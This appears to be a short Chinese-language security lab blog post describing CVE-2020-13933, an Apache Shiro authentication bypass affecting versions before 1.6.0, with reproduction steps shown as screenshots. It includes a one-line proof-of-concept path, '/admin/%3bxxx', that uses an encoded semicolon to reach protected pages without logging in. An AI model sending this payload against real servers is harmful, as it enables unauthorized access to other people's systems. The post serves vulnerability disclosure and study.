cve-2020-13933
漏洞描述:Apahce Shiro 由于处理身份验证请求时出错 存在 权限绕过漏洞,远程攻击者可以发送特制的HTTP请求,绕过身份验证过程并获得对应用程序的未授权访问。
影响版本:Apache Shiro < 1.6.0
POC:/admin/%3bxxx
参考资料:https://www.anquanke.com/post/id/218270
攻击复现:
- 访问首页
![图片[1]-【初级】Shiro 身份验证绕过-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090345-1024x367.png)
访问登陆页
![图片[2]-【初级】Shiro 身份验证绕过-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090357.png)
使用payload进行未授权访问
![图片[3]-【初级】Shiro 身份验证绕过-NGC660安全实验室](http://ngc660.cn/wp-content/uploads/2022/09/d2b5ca33bd090411.png)
© 版权声明
部分文章采集于互联网,若侵权请联系删除!
THE END
请登录后查看评论内容